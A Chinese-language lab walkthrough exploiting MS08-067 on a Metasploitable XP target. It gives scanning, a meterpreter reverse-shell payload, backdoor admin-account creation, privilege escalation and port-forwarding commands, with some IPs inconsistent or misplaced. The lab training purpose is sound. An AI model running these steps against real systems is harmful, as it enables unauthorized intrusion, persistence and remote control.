0x00 Metasploitable

Metasploitable漏洞演練系統(tǒng)，基于ubuntu、xp操作系統(tǒng)，本身設(shè)計(jì)作為安全工具測試和演示常見漏洞攻擊，他的作用是用來作為MSF攻擊用的靶機(jī),他是一個(gè)具有無數(shù)未打補(bǔ)丁漏洞與開放了無數(shù)高危端口的滲透演練系統(tǒng)，可以使我們進(jìn)行練習(xí)。
本次測試使用xp系統(tǒng)的靶機(jī)，下載地址

0x01 查看詳細(xì)信息

nmap -sP -T5 
nmap -P1-65535 -T4 

使用nmap進(jìn)行探測發(fā)現(xiàn)，使用nmap結(jié)合腳本進(jìn)行掃描測試：

nmap -sT -A --script=smb-check-vulns -P0 192
-sT 使用TCP Connect掃描
-A 是指高級操作系統(tǒng)探測功能，對一個(gè)特定服務(wù)進(jìn)行更深的旗標(biāo)和指紋攫取
--script=smb-check-vulns 調(diào)用smb-check-vulns腳本
-P0 進(jìn)行更深層次的掃描，不進(jìn)行主機(jī)發(fā)現(xiàn).168.0.146

發(fā)現(xiàn)探測出MS08-067漏洞，使用Metasploit進(jìn)行攻擊利用。

0x02 Metasploit的利用

2.1 查找 MS08-067相關(guān)的模塊

2.2 使用選中的模塊并查看

set TARGET 5

2.2 設(shè)置攻擊參數(shù)
show options 查看一下參數(shù)，確保無誤
設(shè)置PAYLOAD（攻擊載荷）
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.146 設(shè)置遠(yuǎn)程主機(jī)IP地址
set LHOST 192.168.1.179 設(shè)置反向連接地址為本機(jī)IP地址
set LPORT 55555 設(shè)置本機(jī)監(jiān)聽的TCP端口號
這個(gè)載荷在攻擊成功后，會從目標(biāo)主機(jī)發(fā)起一個(gè)反彈連接，連接到LHOST中指定的IP地址。

2.3 開始攻擊，發(fā)現(xiàn)已經(jīng)上鉤；

0x03 提權(quán)

3.1 查看權(quán)限，判斷是否需要進(jìn)行提權(quán)

getuid

3.2 增加用戶名并設(shè)置為管理員

net user zjw 123 /add
net localgroup administrators zjw /add

3.3 開啟3389端口遠(yuǎn)程登錄

run getgui -e （僅僅是打開遠(yuǎn)程管理）
run getgui -u hacker -p s3cr3t（打開遠(yuǎn)程管理并且創(chuàng)造一個(gè)新的用戶名為Hacker密碼為s3cr3t的帳號）

3.4 遠(yuǎn)程連接目標(biāo)主機(jī)
rdesktop -f -a 16 192.168.0.146:3389
成功登陸目標(biāo)主機(jī)

0x04 補(bǔ)充知識

4.1 拿到shell只是普通用戶怎么辦？
上面演示的直接就是最高權(quán)限，當(dāng)然這種情況在平時(shí)滲透測試中也是比較少見的，那么我們就得進(jìn)行提權(quán)了。

meterpreter > background
msf exploit(handler) > search ms16
msf exploit(handler) > use exploit/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > info
msf exploit(ms16_016_webdav) > show options
msf exploit(ms16_016_webdav) > set SESSION 1    # 設(shè)置會剛才我們后門連接的ID號 1
msf exploit(ms16_016_webdav) > exploit
msf exploit(ms16_016_webdav) > sessions
msf exploit(ms16_016_webdav) > sessions -i 1
meterpreter > getuid

這是發(fā)現(xiàn)我們怎么還是普通權(quán)限，我們進(jìn)行查看進(jìn)程。然后加載我們的進(jìn)程號

meterpreter > ps
meterpreter > migrate + 進(jìn)程號

這樣已經(jīng)提升為了system權(quán)限

4.2 有時(shí)候我們在公網(wǎng)而目標(biāo)主機(jī)在內(nèi)網(wǎng)如何登陸？
這時(shí)候就要使用端口轉(zhuǎn)發(fā)來實(shí)現(xiàn)了，將目標(biāo)主機(jī)的端口轉(zhuǎn)發(fā)到我們本機(jī)。

portfwd add -l 你本機(jī)的監(jiān)聽端口 -r 127.0.0.1 -p 3389

執(zhí)行之后所有端口3389的內(nèi)網(wǎng)流量都會通過這個(gè)meterpreter的會話來轉(zhuǎn)發(fā)到你kali的127.0.0.1的指定端口上 。
假如在這里我設(shè)置的監(jiān)聽端口為2222，那么我執(zhí)行的就是

portfwd add -l 2222 -r 127.0.0.1 -p 3389

然后開始連接遠(yuǎn)程桌面。新建一個(gè)終端窗口，執(zhí)行連接Windows遠(yuǎn)程桌面的命令就OK了。

rdesktop 127.1.1.0:2222